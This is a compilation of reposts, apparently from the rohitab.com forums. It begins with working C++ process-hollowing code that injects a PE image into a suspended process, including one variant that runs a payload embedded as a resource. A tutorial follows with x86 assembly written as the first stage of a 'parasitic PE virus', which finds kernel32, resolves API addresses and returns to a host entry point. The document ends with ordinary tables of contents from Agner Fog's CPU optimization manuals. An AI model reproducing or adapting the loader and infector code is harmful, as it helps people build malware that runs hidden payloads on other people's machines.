int)ntNtHeader.OptionalHeader.ImageBase && lImageSize <= lLocalImageSize) { VirtualProtectEx(piProcessInformation.hProcess,(LPVOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lImageSize,PAGE_EXECUTE_READWRITE,(unsigned long*)&lPreviousProtection); } else { if(!NtUnmapViewOfSection(piProcessInformation.hProcess,(LPVOID)((DWORD)lLocalImageBase))) VirtualAllocEx(piProcessInformation.hProcess,(LPVOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lImageSize,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE); } // Write Image to Process if(WriteProcessMemory(piProcessInformation.hProcess,(LPVOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lpImageMemory,lImageSize,(unsigned long*)&lWritten)) { bReturnValue = true; } // Set Image Base if(WriteProcessMemory(piProcessInformation.hProcess,(LPVOID)((long int)cContext.Ebx + 8),&ntNtHeader.OptionalHeader.ImageBase,4,(unsigned long*)&lWritten)) { if(bReturnValue == true) bReturnValue = true; } if(bReturnValue == false) { delete [] pProcessName; delete [] lpImageMemory; return bReturnValue; } // Set the new entry point cContext.Eax = ntNtHeader.OptionalHeader.ImageBase + ntNtHeader.OptionalHeader.AddressOfEntryPoint; SetThreadContext(piProcessInformation.hThread,&cContext); if(lLocalImageBase == (long int)ntNtHeader.OptionalHeader.ImageBase && lImageSize <= lLocalImageSize) VirtualProtectEx(piProcessInformation.hProcess,(LPVOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lImageSize,lPreviousProtection,0); // Resume the process ResumeThread(piProcessInformation.hThread); } delete [] pProcessName; delete [] lpImageMemory; return bReturnValue; } ///////////////////////////////////////////////////////////// // Fork Process From Resource // Dynamically create a process from a resource file. bool ForkProcessFromResource(int iResource,char* pResourceSection) { HGLOBAL hResData; HRSRC hResInfo; LPVOID lpRes; LPVOID lpMemory; long int lSize; HMODULE hModule; bool bReturn; hModule = GetModuleHandle(0); bReturn = false; if(!hModule) return bReturn; hResInfo = FindResource(hModule, MAKEINTRESOURCE(iResource), pResourceSection); if(!hResInfo) { return bReturn; } hResData = LoadResource(hModule, hResInfo); if(!hResData) { return bReturn; } lpRes = LockResource(hResData); if(!lpRes) { FreeResource(hResData); return bReturn; } lSize = SizeofResource(hModule, hResInfo); lpMemory = new LPVOID[lSize]; ZeroMemory(lpMemory,lSize); memcpy (lpMemory, lpRes, lSize); bReturn = ForkProcess(lpMemory); FreeResource(hResData); delete [] lpMemory; return bReturn; } Download: http://pastebin.com/6QXuSsa7 Via: Run from memory - rohitab.com - Forums

[h=1]Finding Kernel32 Base and walking its export table[/h]Author: [h=3]SIGSEGV[/h] Hey all , I'll just begin as the title says it all. Only Basic PE-format and assembly knowledge are required. The baby steps of any parasitic PE virus should be Finding the Kernel32 Base in the current process address space , then walking its export table to extract the addresses of all the functions it needs. To find the Kernel base , We'll exploit the fact that the Process Environment Block structure of the current process holds a list of the modules , loaded in the process's address space , in their memory loading order , InMemoryOrderModuleList. In Windows NT , The value at offset 0x30 of the FS segment points to the PEB structure : typedef struct _PEB { BOOLEAN InheritedAddressSpace; BOOLEAN ReadImageFileExecOptions; BOOLEAN BeingDebugged; BOOLEAN Spare; HANDLE Mutant; PVOID ImageBaseAddress; PPEB_LDR_DATA LoaderData; // The rest of the structure is irrelevant to us } PEB, *PPEB; So , we follow the LoaderData pointer , which takes us to another structure , PEB_LDR_DATA : typedef struct _PEB_LDR_DATA { ULONG Length; BOOLEAN Initialized; PVOID SsHandle; LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; } PEB_LDR_DATA, *PPEB_LDR_DATA; InMemoryOrderModule is a double linked list and it's what we are interested in , each entry in the list points to an LDR_MODULE structure : typedef struct _LDR_MODULE { LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; PVOID BaseAddress; //..... } LDR_MODULE, *PLDR_MODULE; This structure holds the base address of it's module ,, Now , from Windows 2000 and up to windows 7 , The third module loaded in memory will always be that kernel32.dll. Putting all into code : mov ebx, [FS : 0x30] ; PEB mov ebx, [ebx + 0x0C] ; PEB->Ldr mov ebx, [ebx + 0x14] ; PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry) mov ebx, [ebx] ; 2nd Entry mov ebx, [ebx] ; 3rd Entry mov ebx, [ebx + 0x10] ; Third entry's base address (Kernel32.dll) mov [ebp+dwKernelBase] , ebx The following example does the following : Find Kernel32.dll base address Parse it's export tables to locate GetProcAddress Use it to locate LoadLibraryA Use it to Load User32.dll into the current address space Use GetProcAddress to locate MessageBoxA in User32.dll Display a Message box Return to Host. I'm in the middle of my final exams , so I'm afraid I can't explain the example thoroughly , but anyone with basic PE and assembly knowledge should easily grasp it. ; By SIGSEGV [BITS 32] pushad call CodeStart CodeStart: pop ebp sub ebp,CodeStart ; delta offset shit mov ebx, [FS : 0x30] ; get a pointer to the PEB mov ebx, [ebx + 0x0C] ; get PEB->Ldr mov ebx, [ebx + 0x14] ; get PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry) mov ebx, [ebx] ; 2nd Entry mov ebx, [ebx] ; 3rd Entry mov ebx, [ebx + 0x10] ; Get Kernel32 Base mov [ebp+dwKernelBase] , ebx add ebx, [ebx+0x3C] ; Start of PE header mov ebx, [ebx+0x78] ; RVA of export dir add ebx, [ebp+dwKernelBase] ; VA of export dir mov [ebp+dwExportDirectory] , ebx lea edx,[ebp+api_GetProcAddress] mov ecx,[ebp+len_GetProcAddress] call GetFunctionAddress mov [ebp+AGetProcAddressA] , eax lea edx,[ebp+api_LoadLibrary] push edx push dword [ebp+dwKernelBase] call eax mov [ebp+ALoadLibraryA] , eax lea edx , [ebp+szUser32] push edx call eax lea edx , [ebp+api_MessageBoxA] push edx push eax mov ebx,[ebp+AGetProcAddressA] call ebx mov [ebp+AMessageBoxAA] , eax push 0 lea edx,[ebp+szTitle] push edx lea edx,[ebp+szMsg] push edx push 0 call eax popad push 0xBBBBBBBB ;OEP retn ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; <<<<< GetFunctionAddress >>>>>> ; ; Extracts Function Address From Export Directory and returns it in eax ; ; Parameters : Function name in edx , Length in ecx ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; GetFunctionAddress: push ebx push esi push edi mov esi, [ebp+dwExportDirectory] mov esi, [esi+0x20] ;RVA of ENT add esi, [ebp+dwKernelBase] ;VA of ENT xor ebx,ebx cld looper: inc ebx lodsd add eax , [ebp+dwKernelBase] ;eax now points to the string of a function push esi ;preserve it for the outer loop mov esi,eax mov edi,edx cld push ecx repe cmpsb pop ecx pop esi jne looper dec ebx mov eax,[ebp+dwExportDirectory] mov eax,[eax+0x24] ;RVA of EOT add eax,[ebp+dwKernelBase] ;VA of EOT movzx eax , word [ebx*2+eax] ;eax now holds the ordinal of our function mov ebx,[ebp+dwExportDirectory] mov ebx,[ebx+0x1C] ;RVA of EAT add ebx,[ebp+dwKernelBase] ;VA of EAT mov ebx,[eax*4+ebx] add ebx,[ebp+dwKernelBase] mov eax,ebx pop edi pop esi pop ebx ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; Data Shit ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; szTitle: db "Yo !",0 szMsg: db "GreeTz From SIGSEGV",0 szUser32 db "User32.dll",0 AGetProcAddressA: dd 0 api_GetProcAddress: db "GetProcAddress" len_GetProcAddress: dd $-api_GetProcAddress ALoadLibraryA: dd 0 api_LoadLibrary: db "LoadLibraryA",0 AMessageBoxAA: dd 0 api_MessageBoxA: db "MessageBoxA",0 dwKernelBase: dd 0 dwExportDirectory: dd 0 That's it , but I shall post the complete virus source when i get through my exams. Hope you enjoyed this quick tutorial , any feedback is appreciated. Greets , SIGSEGV. Sursa: [Quick tutorial] Finding Kernel32 Base and walking its export table. - rohitab.com - Forums

Calling conventions for different C++ compilers and operating systems By Agner Fog. Copenhagen University College of Engineering. Copyright © 2004 - 2011. Last updated 2011-06-08. Contents 1 Introduction ....................................................................................................................... 3 2 The need for standardization............................................................................................. 5 3 Data representation........................................................................................................... 6 4 Data alignment .................................................................................................................. 8 5 Stack alignment................................................................................................................. 9 6 Register usage................................................................................................................ 10 6.1 Can floating point registers be used in 64-bit Windows? ........................................... 13 6.2 YMM vector registers................................................................................................ 14 6.3 Register usage in kernel code................................................................................... 14 7 Function calling conventions ........................................................................................... 16 7.1 Passing and returning objects................................................................................... 19 7.2 Passing and returning SIMD types............................................................................ 22 8 Name mangling ............................................................................................................... 24 8.1 Microsoft name mangling.......................................................................................... 28 8.2 Borland name mangling ............................................................................................ 33 8.3 Watcom name mangling ........................................................................................... 34 8.4 Gnu2 name mangling................................................................................................ 35 8.5 Gnu3-4 name mangling ............................................................................................ 37 8.6 Intel name mangling for Windows ............................................................................. 39 8.7 Intel name mangling for Linux ................................................................................... 40 8.8 Symantec and Digital Mars name mangling .............................................................. 40 8.9 Codeplay name mangling ......................................................................................... 40 8.10 Other compilers ...................................................................................................... 40 8.11 Turning off name mangling with extern "C" ............................................................. 41 8.12 Conclusion.............................................................................................................. 42 9 Exception handling and stack unwinding ......................................................................... 42 10 Initialization and termination functions........................................................................... 43 11 Virtual tables and runtime type identification.................................................................. 43 12 Communal data............................................................................................................. 44 13 Memory models............................................................................................................. 44 13.1 16-bit memory models ............................................................................................ 44 13.2 32-bit memory models ............................................................................................ 45 13.3 64-bit memory models in Windows ......................................................................... 45 13.4 64-bit memory models in Linux and BSD ................................................................ 45 13.5 64-bit memory models in Intel-based Mac (Darwin) ................................................ 45 14 Relocation of executable code....................................................................................... 46 15 Object file formats .........................................................................................................48 15.1 OMF format............................................................................................................. 48 15.2 COFF format........................................................................................................... 49 15.3 ELF format.............................................................................................................. 49 15.4 Mach-O format........................................................................................................ 50 15.5 a.out format............................................................................................................. 50 15.6 Comparison of object file formats............................................................................ 50 15.7 Conversion between object file formats................................................................... 50 15.8 Intermediate file formats ......................................................................................... 51 16 Debug information......................................................................................................... 51 17 Data endian-ness .......................................................................................................... 52 2 18 Predefined macros ........................................................................................................ 52 19 Available C++ Compilers ............................................................................................... 54 19.1 Microsoft .................................................................................................................54 19.2 Borland ...................................................................................................................54 19.3 Watcom .................................................................................................................. 54 19.4 Gnu......................................................................................................................... 54 19.5 Digital Mars............................................................................................................. 54 19.6 Codeplay ................................................................................................................ 54 19.7 Intel......................................................................................................................... 54 20 Literature...................................................................................................................... 55 20.1 ABI’s for Unix, Linux, BSD and Mac OS X (Intel-based).......................................... 55 20.2 ABIs for Windows.................................................................................................... 55 20.3 Object file format specifications............................................................................... 56 21 Copyright notice ............................................................................................................56 22 Acknowledgments ......................................................................................................... 56 Via: Software optimization resources - rohitab.com - Forums Download: http://agner.org/optimize/calling_conventions.pdf

Instruction tables Lists of instruction latencies, throughputs and microoperation breakdowns for Intel, AMD and VIA CPUs By Agner Fog. Copenhagen University College of Engineering. Copyright © 1996 - 2011. Last updated 2011-06-08. Contents 1 Introduction ....................................................................................................................... 3 1.1 Definition of terms....................................................................................................... 4 1.2 Microprocessor versions tested .................................................................................. 5 1.3 How the values were measured.................................................................................. 6 2 List of instruction timings for Intel Pentium and Pentium MMX........................................... 8 2.1 Integer instructions (Pentium and Pentium MMX) ....................................................... 8 2.2 Floating point instructions (Pentium and Pentium MMX) ........................................... 10 2.3 MMX instructions (Pentium MMX)............................................................................. 12 3 List of instruction timings and µop breakdown for Intel Pentium II and Pentium III........... 13 3.1 Integer instructions (Pentium Pro, Pentium II and Pentium III) .................................. 13 3.2 Floating point x87 instructions (Pentium Pro, Pentium II and Pentium III) ................. 16 3.3 Integer MMX instructions (Pentium II and Pentium III) .............................................. 17 3.4 Floating point XMM instructions (Pentium III) ............................................................ 19 4 List of instruction timings and µop breakdown for Intel Pentium M................................... 21 4.1 Integer instructions.................................................................................................... 21 4.2 Floating point x87 instructions................................................................................... 25 4.3 Integer MMX and XMM instructions .......................................................................... 26 4.4 Floating point XMM instructions ................................................................................ 29 5 List of instruction timings and µop breakdown for Intel Core 2 (Merom, 65nm)................ 32 5.1 Integer instructions.................................................................................................... 33 5.2 Floating point x87 instructions................................................................................... 37 5.3 Integer MMX and XMM instructions .......................................................................... 39 5.4 Floating point XMM instructions ................................................................................ 42 6 List of instruction timings and µop breakdown for Intel Core 2 (Wolfdale, 45nm) ............. 45 6.1 Integer instructions.................................................................................................... 46 6.2 Floating point x87 instructions................................................................................... 50 6.3 Integer MMX and XMM instructions .......................................................................... 52 6.4 Floating point XMM instructions ................................................................................ 56 7 List of instruction timings and µop breakdown for Intel Nehalem ..................................... 59 7.1 Integer instructions.................................................................................................... 60 7.2 Floating point x87 instructions................................................................................... 65 7.3 Integer MMX and XMM instructions .......................................................................... 67 7.4 Floating point XMM instructions ................................................................................ 71 8 List of instruction timings and µop breakdown for Intel Sandy Bridge .............................. 74 8.1 Integer instructions.................................................................................................... 75 8.2 Floating point x87 instructions................................................................................... 79 8.3 Integer MMX and XMM instructions .......................................................................... 81 8.4 Floating point XMM instructions ................................................................................ 85 9 List of instruction timings and µop breakdown for Intel Pentium 4.................................... 90 9.1 integer instructions.................................................................................................... 91 9.2 Floating point x87 instructions................................................................................... 95 9.3 Integer MMX and XMM instructions .......................................................................... 96 9.4 Floating point XMM instructions ................................................................................ 98 10 List of instruction timings and µop br. for Intel Pentium 4 w. EM64T (Prescott)............ 100 10.1 Integer instructions................................................................................................ 101 2 10.2 Floating point x87 instructions............................................................................... 105 10.3 Integer MMX and XMM instructions ...................................................................... 107 10.4 Floating point XMM instructions ............................................................................ 109 11 List of instruction timings and µop breakdown for Intel Atom....................................... 111 11.1 Integer instructions................................................................................................ 111 11.2 Floating point x87 instructions............................................................................... 116 11.3 Integer MMX and XMM instructions ...................................................................... 118 11.4 Floating point XMM instructions ............................................................................ 120 12 List of instruction timings and µop breakdown for VIA Nano 2000 series..................... 122 12.1 Integer instructions................................................................................................ 122 12.2 Floating point x87 instructions............................................................................... 126 12.3 Integer MMX and XMM instructions ...................................................................... 128 12.4 Floating point XMM instructions ............................................................................ 130 12.5 VIA-specific instructions........................................................................................ 132 13 List of instruction timings and µop breakdown for VIA Nano 3000 series..................... 133 13.1 Integer instructions................................................................................................ 133 13.2 Floating point x87 instructions............................................................................... 137 13.3 Integer MMX and XMM instructions ...................................................................... 139 13.4 Floating point XMM instructions ............................................................................ 141 13.5 VIA-specific instructions........................................................................................ 143 14 Instruction timings and macro-operation breakdown for AMD K7 ................................ 144 14.1 Integer instructions................................................................................................ 144 14.2 Floating point x87 instructions............................................................................... 148 14.3 Integer MMX instructions ...................................................................................... 150 14.4 Floating point XMM instructions ............................................................................ 151 14.5 3DNow instructions............................................................................................... 152 15 Instruction timings and macro-operation breakdown for AMD K8 ................................ 153 15.1 Integer instructions................................................................................................ 153 15.2 Floating point x87 instructions............................................................................... 157 15.3 Integer MMX and XMM instructions ...................................................................... 159 15.4 Floating point XMM instructions ............................................................................ 161 15.5 3DNow instructions............................................................................................... 162 16 Instruction timings and macro-operation breakdown for AMD K10 .............................. 164 16.1 Integer instructions................................................................................................ 164 16.2 Floating point x87 instructions............................................................................... 168 16.3 Integer MMX and XMM instructions ...................................................................... 170 16.4 Floating point XMM instructions ............................................................................ 172 16.5 3DNow instructions............................................................................................... 173 17 Instruction timings and macro-operation breakdown for AMD Bobcat.......................... 175 17.1 Integer instructions................................................................................................ 175 17.2 Floating point x87 instructions............................................................................... 179 17.3 Integer MMX and XMM instructions ...................................................................... 181 17.4 Floating point XMM instructions ............................................................................ 183 18 Instruction set compatibility table................................................................................. 185 18.1 Explanation of instruction sets .............................................................................. 186 19 Comparison of the different microprocessors .............................................................. 190 20 Literature..................................................................................................................... 191 21 Copyright notice .......................................................................................................... 191 Via: Software optimization resources - rohitab.com - Forums Download: http://agner.org/optimize/instruction_tables.pdf

The microarchitecture of Intel, AMD and VIA CPUs An optimization guide for assembly programmers and compiler makers By Agner Fog. Copenhagen University College of Engineering. Copyright © 1996 - 2011. Last updated 2011-06-08. Contents 1 Introduction ....................................................................................................................... 4 1.1 About this manual ....................................................................................................... 4 1.2 Microprocessor versions covered by this manual........................................................ 5 2 Out-of-order execution (All processors except P1, PMMX)................................................ 7 2.1 Instructions are split into µops..................................................................................... 7 2.2 Register renaming ...................................................................................................... 8 3 Branch prediction (all processors) ................................................................................... 10 3.1 Prediction methods for conditional jumps.................................................................. 10 3.2 Branch prediction in P1............................................................................................. 15 3.3 Branch prediction in PMMX, PPro, P2, and P3 ......................................................... 19 3.4 Branch prediction in P4 and P4E .............................................................................. 20 3.5 Branch prediction in PM and Core2 .......................................................................... 23 3.6 Branch prediction in Intel Nehalem ........................................................................... 25 3.7 Branch prediction in Intel Sandy Bridge .................................................................... 26 3.8 Branch prediction in Intel Atom ................................................................................. 26 3.9 Branch prediction in VIA Nano.................................................................................. 27 3.10 Branch prediction in AMD K8 and K10.................................................................... 28 3.11 Branch prediction in AMD Bobcat ........................................................................... 30 3.12 Indirect jumps on older processors ......................................................................... 31 3.13 Returns (all processors except P1) ......................................................................... 31 3.14 Static prediction ...................................................................................................... 32 3.15 Close jumps............................................................................................................ 33 4 Pentium 1 and Pentium MMX pipeline............................................................................. 35 4.1 Pairing integer instructions........................................................................................ 35 4.2 Address generation interlock..................................................................................... 39 4.3 Splitting complex instructions into simpler ones ........................................................ 39 4.4 Prefixes..................................................................................................................... 40 4.5 Scheduling floating point code .................................................................................. 41 5 Pentium Pro, II and III pipeline......................................................................................... 44 5.1 The pipeline in PPro, P2 and P3 ............................................................................... 44 5.2 Instruction fetch ........................................................................................................ 44 5.3 Instruction decoding.................................................................................................. 45 5.4 Register renaming .................................................................................................... 49 5.5 ROB read.................................................................................................................. 49 5.6 Out of order execution .............................................................................................. 53 5.7 Retirement ................................................................................................................ 54 5.8 Partial register stalls.................................................................................................. 55 5.9 Store forwarding stalls .............................................................................................. 58 5.10 Bottlenecks in PPro, P2, P3.................................................................................... 59 6 Pentium M pipeline.......................................................................................................... 61 6.1 The pipeline in PM.................................................................................................... 61 6.2 The pipeline in Core Solo and Duo ........................................................................... 62 6.3 Instruction fetch ........................................................................................................ 62 6.4 Instruction decoding.................................................................................................. 62 2 6.5 Loop buffer ............................................................................................................... 64 6.6 Micro-op fusion ......................................................................................................... 64 6.7 Stack engine............................................................................................................. 66 6.8 Register renaming .................................................................................................... 68 6.9 Register read stalls ................................................................................................... 68 6.10 Execution units ....................................................................................................... 70 6.11 Execution units that are connected to both port 0 and 1.......................................... 70 6.12 Retirement .............................................................................................................. 72 6.13 Partial register access............................................................................................. 72 6.14 Store forwarding stalls ............................................................................................ 74 6.15 Bottlenecks in PM................................................................................................... 74 7 Core 2 and Nehalem pipeline .......................................................................................... 77 7.1 Pipeline..................................................................................................................... 77 7.2 Instruction fetch and predecoding ............................................................................. 77 7.3 Instruction decoding.................................................................................................. 80 7.4 Micro-op fusion ......................................................................................................... 80 7.5 Macro-op fusion........................................................................................................ 81 7.6 Stack engine............................................................................................................. 82 7.7 Register renaming .................................................................................................... 82 7.8 Register read stalls ................................................................................................... 83 7.9 Execution units ......................................................................................................... 84 7.10 Retirement .............................................................................................................. 88 7.11 Partial register access............................................................................................. 88 7.12 Store forwarding stalls ............................................................................................ 89 7.13 Cache and memory access..................................................................................... 91 7.14 Breaking dependency chains .................................................................................. 91 7.15 Multithreading in Nehalem ...................................................................................... 92 7.16 Bottlenecks in Core2 and Nehalem......................................................................... 93 8 Sandy Bridge pipeline ..................................................................................................... 95 8.1 Pipeline..................................................................................................................... 95 8.2 Instruction fetch and decoding .................................................................................. 95 8.3 µop cache................................................................................................................. 95 8.4 Loopback buffer ........................................................................................................ 96 8.5 Micro-op fusion ......................................................................................................... 96 8.6 Macro-op fusion........................................................................................................ 96 8.7 Stack engine............................................................................................................. 97 8.8 Register allocation and renaming.............................................................................. 97 8.9 Register read stalls ................................................................................................... 98 8.10 Execution units ....................................................................................................... 98 8.11 Partial register access........................................................................................... 101 8.12 Transitions between VEX and non-VEX modes .................................................... 102 8.13 Cache and memory access................................................................................... 102 8.14 Store forwarding stalls .......................................................................................... 103 8.15 Multithreading ....................................................................................................... 103 8.16 Bottlenecks in Sandy Bridge ................................................................................. 104 9 Pentium 4 (NetBurst) pipeline........................................................................................ 106 9.1 Data cache ............................................................................................................. 106 9.2 Trace cache............................................................................................................ 106 9.3 Instruction decoding................................................................................................ 111 9.4 Execution units ....................................................................................................... 112 9.5 Do the floating point and MMX units run at half speed? .......................................... 114 9.6 Transfer of data between execution units................................................................ 117 9.7 Retirement .............................................................................................................. 119 9.8 Partial registers and partial flags............................................................................. 120 9.9 Store forwarding stalls ............................................................................................ 121 9.10 Memory intermediates in dependency chains ....................................................... 121 9.11 Breaking dependency chains ................................................................................ 123 9.12 Choosing the optimal instructions ......................................................................... 123 3 9.13 Bottlenecks in P4 and P4E.................................................................................... 126 10 Intel Atom pipeline....................................................................................................... 129 10.1 Instruction fetch .................................................................................................... 129 10.2 Instruction decoding.............................................................................................. 129 10.3 Execution units ..................................................................................................... 129 10.4 Instruction pairing.................................................................................................. 130 10.5 X87 floating point instructions ............................................................................... 131 10.6 Instruction latencies .............................................................................................. 132 10.7 Memory access..................................................................................................... 132 10.8 Branches and loops .............................................................................................. 133 10.9 Multithreading ....................................................................................................... 133 10.10 Bottlenecks in Atom............................................................................................ 134 11 VIA Nano pipeline........................................................................................................ 135 11.1 Performance monitor counters.............................................................................. 135 11.2 Instruction fetch .................................................................................................... 135 11.3 Instruction decoding.............................................................................................. 135 11.4 Instruction fusion................................................................................................... 135 11.5 Out of order system .............................................................................................. 136 11.6 Execution ports ..................................................................................................... 136 11.7 Latencies between execution units ....................................................................... 137 11.8 Partial registers and partial flags........................................................................... 139 11.9 Breaking dependence ........................................................................................... 139 11.10 Memory access................................................................................................... 140 11.11 Branches and loops ............................................................................................ 140 11.12 VIA specific instructions ...................................................................................... 140 11.13 Bottlenecks in Nano............................................................................................ 141 12 AMD K8 and K10 pipeline ........................................................................................... 142 12.1 The pipeline in AMD processors ........................................................................... 142 12.2 Instruction fetch .................................................................................................... 144 12.3 Predecoding and instruction length decoding........................................................ 144 12.4 Single, double and vector path instructions........................................................... 145 12.5 Stack engine......................................................................................................... 146 12.6 Integer execution pipes......................................................................................... 146 12.7 Floating point execution pipes............................................................................... 146 12.8 Mixing instructions with different latency ............................................................... 148 12.9 64 bit versus 128 bit instructions........................................................................... 149 12.10 Data delay between differently typed instructions................................................ 150 12.11 Partial register access......................................................................................... 150 12.12 Partial flag access............................................................................................... 151 12.13 Store forwarding stalls ........................................................................................ 151 12.14 Loops.................................................................................................................. 152 12.15 Cache ................................................................................................................. 152 12.16 Bottlenecks in AMD............................................................................................. 154 13 AMD Bobcat pipeline................................................................................................... 155 13.1 The pipeline in AMD Bobcat.................................................................................. 156 13.2 Instruction fetch .................................................................................................... 156 13.3 Instruction decoding.............................................................................................. 156 13.4 Single, double and complex instructions ............................................................... 156 13.5 Integer execution pipes......................................................................................... 156 13.6 Floating point execution pipes............................................................................... 156 13.7 Mixing instructions with different latency ............................................................... 157 13.8 Dependency-breaking instructions........................................................................ 157 13.9 Data delay between differently typed instructions ................................................. 157 13.10 Partial register access......................................................................................... 157 13.11 Cache ................................................................................................................. 157 13.12 Store forwarding stalls ........................................................................................ 158 13.13 Bottlenecks in Bobcat ......................................................................................... 158 13.14 Literature: ........................................................................................................... 158 4 14 Comparison of microarchitectures ............................................................................... 158 14.1 The AMD kernel.................................................................................................... 158 14.2 The Pentium 4 kernel............................................................................................ 160 14.3 The Pentium M kernel........................................................................................... 161 14.4 Intel Core 2 and Nehalem microarchitecture ......................................................... 162 14.5 Intel Sandy Bridge microarchitecture .................................................................... 163 15 Comparison of low power microarchitectures .............................................................. 164 15.1 Intel Atom microarchitecture ................................................................................. 164 15.2 VIA Nano microarchitecture .................................................................................. 164 15.3 AMD Bobcat microarchitecture.............................................................................. 164 15.4 Conclusion............................................................................................................ 164 15.5 Future trends ........................................................................................................ 166 16 Literature..................................................................................................................... 169 17 Copyright notice .......................................................................................................... 169 Download: http://agner.org/optimize/microarchitecture.pdf

Optimizing subroutines in assembly language An optimization guide for x86 platforms By Agner Fog. Copenhagen University College of Engineering. Copyright © 1996 - 2011. Last updated 2011-06-08. Contents 1 Introduction ....................................................................................................................... 4 1.1 Reasons for using assembly code .............................................................................. 5 1.2 Reasons for not using assembly code ........................................................................ 5 1.3 Microprocessors covered by this manual .................................................................... 6 1.4 Operating systems covered by this manual................................................................. 7 2 Before you start................................................................................................................. 7 2.1 Things to decide before you start programming .......................................................... 7 2.2 Make a test strategy.................................................................................................... 9 2.3 Common coding pitfalls............................................................................................. 10 3 The basics of assembly coding........................................................................................ 12 3.1 Assemblers available................................................................................................ 12 3.2 Register set and basic instructions............................................................................ 14 3.3 Addressing modes .................................................................................................... 18 3.4 Instruction code format ............................................................................................. 24 3.5 Instruction prefixes.................................................................................................... 26 4 ABI standards.................................................................................................................. 27 4.1 Register usage.......................................................................................................... 27 4.2 Data storage ............................................................................................................. 28 4.3 Function calling conventions ..................................................................................... 28 4.4 Name mangling and name decoration ...................................................................... 30 4.5 Function examples.................................................................................................... 31 5 Using intrinsic functions in C++ ....................................................................................... 33 5.1 Using intrinsic functions for system code .................................................................. 35 5.2 Using intrinsic functions for instructions not available in standard C++ ..................... 35 5.3 Using intrinsic functions for vector operations ........................................................... 35 5.4 Availability of intrinsic functions................................................................................. 35 6 Using inline assembly in C++ .......................................................................................... 36 6.1 MASM style inline assembly ..................................................................................... 37 6.2 Gnu style inline assembly ......................................................................................... 41 7 Using an assembler......................................................................................................... 44 7.1 Static link libraries..................................................................................................... 46 7.2 Dynamic link libraries................................................................................................ 46 7.3 Libraries in source code form.................................................................................... 47 7.4 Making classes in assembly...................................................................................... 48 7.5 Thread-safe functions ............................................................................................... 50 7.6 Makefiles ..................................................................................................................50 8 Making function libraries compatible with multiple compilers and platforms..................... 51 8.1 Supporting multiple name mangling schemes........................................................... 52 8.2 Supporting multiple calling conventions in 32 bit mode ............................................. 53 8.3 Supporting multiple calling conventions in 64 bit mode ............................................. 56 8.4 Supporting different object file formats...................................................................... 57 8.5 Supporting other high level languages ...................................................................... 58 9 Optimizing for speed ....................................................................................................... 59 9.1 Identify the most critical parts of your code ............................................................... 59 9.2 Out of order execution .............................................................................................. 59 2 9.3 Instruction fetch, decoding and retirement ................................................................ 62 9.4 Instruction latency and throughput ............................................................................ 63 9.5 Break dependency chains......................................................................................... 64 9.6 Jumps and calls ........................................................................................................ 65 10 Optimizing for size......................................................................................................... 72 10.1 Choosing shorter instructions.................................................................................. 72 10.2 Using shorter constants and addresses .................................................................. 74 10.3 Reusing constants .................................................................................................. 75 10.4 Constants in 64-bit mode ........................................................................................ 75 10.5 Addresses and pointers in 64-bit mode................................................................... 75 10.6 Making instructions longer for the sake of alignment............................................... 77 10.7 Using multi-byte NOPs for alignment ...................................................................... 80 11 Optimizing memory access............................................................................................ 80 11.1 How caching works................................................................................................. 81 11.2 Trace cache............................................................................................................ 82 11.3 µop cache............................................................................................................... 82 11.4 Alignment of data.................................................................................................... 82 11.5 Alignment of code ................................................................................................... 85 11.6 Organizing data for improved caching..................................................................... 86 11.7 Organizing code for improved caching.................................................................... 87 11.8 Cache control instructions....................................................................................... 87 12 Loops ............................................................................................................................ 87 12.1 Minimize loop overhead .......................................................................................... 88 12.2 Induction variables.................................................................................................. 90 12.3 Move loop-invariant code........................................................................................ 91 12.4 Find the bottlenecks................................................................................................ 92 12.5 Instruction fetch, decoding and retirement in a loop ................................................ 92 12.6 Distribute µops evenly between execution units...................................................... 93 12.7 An example of analysis for bottlenecks on PM........................................................ 93 12.8 Same example on Core2 ........................................................................................ 97 12.9 Same example on Sandy Bridge............................................................................. 98 12.10 Loop unrolling ....................................................................................................... 99 12.11 Optimize caching ................................................................................................ 101 12.12 Parallelization ..................................................................................................... 102 12.13 Analyzing dependences...................................................................................... 104 12.14 Loops on processors without out-of-order execution........................................... 108 12.15 Macro loops ........................................................................................................ 109 13 Vector programming.................................................................................................... 111 13.1 Conditional moves in SIMD registers .................................................................... 113 13.2 Using vector instructions with other types of data than they are intended for ........ 116 13.3 Shuffling data........................................................................................................ 117 13.4 Generating constants............................................................................................ 121 13.5 Accessing unaligned data ..................................................................................... 123 13.6 Using AVX instruction set and YMM registers ....................................................... 127 13.7 Vector operations in general purpose registers ..................................................... 131 14 Multithreading.............................................................................................................. 133 14.1 Hyperthreading ..................................................................................................... 133 15 CPU dispatching.......................................................................................................... 134 15.1 Checking for operating system support for XMM and YMM registers .................... 135 16 Problematic Instructions .............................................................................................. 136 16.1 LEA instruction (all processors)............................................................................. 136 16.2 INC and DEC........................................................................................................ 137 16.3 XCHG (all processors) .......................................................................................... 137 16.4 Shifts and rotates (P4) .......................................................................................... 138 16.5 Rotates through carry (all processors) .................................................................. 138 16.6 Bit test (all processors) ......................................................................................... 138 16.7 LAHF and SAHF (all processors) .......................................................................... 138 16.8 Integer multiplication (all processors).................................................................... 138 3 16.9 Division (all processors)........................................................................................ 138 16.10 String instructions (all processors) ...................................................................... 143 16.11 WAIT instruction (all processors) ........................................................................ 144 16.12 FCOM + FSTSW AX (all processors).................................................................. 145 16.13 FPREM (all processors) ...................................................................................... 146 16.14 FRNDINT (all processors)................................................................................... 146 16.15 FSCALE and exponential function (all processors) ............................................. 146 16.16 FPTAN (all 